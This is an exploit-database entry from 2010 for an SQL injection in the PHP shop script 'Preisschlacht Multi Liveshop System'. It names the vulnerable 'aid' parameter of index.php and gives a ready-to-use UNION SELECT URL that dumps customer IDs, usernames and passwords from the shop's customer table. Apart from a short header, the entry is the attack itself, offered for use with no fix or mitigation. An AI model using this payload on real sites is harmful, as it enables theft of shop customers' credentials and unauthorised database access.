Preisschlacht Multi Liveshop System (seite&aid) index.php SQL Injection

2010-03-17T00:00:00
ID 1337DAY-ID-9704
Type zdt
Reporter Easy Laster
Modified 2010-03-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
Preisschlacht Multi Liveshop System (seite&aid) index.php SQL Injection
=======================================================================

----------------------------Information------------------------------------------------
+Name : Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php
+Autor : Easy Laster
+Date   : 17.03.2010
+Script  : Preisschlacht Multi Liveshop System
+Download : ------------------
 
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/forum/index.php?seite=17&aid=
 
+Exploitable   : http://www.site.com/forum/index.php?seite=17&aid=111111111+union+select
+1,2,concat(ID,0x3a,Benutzer,0x3a,passwort),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23+from+ls_kunden+where+id=1
 
-----------------------------------------------------------------------------------------



#  0day.today [2018-04-04]  #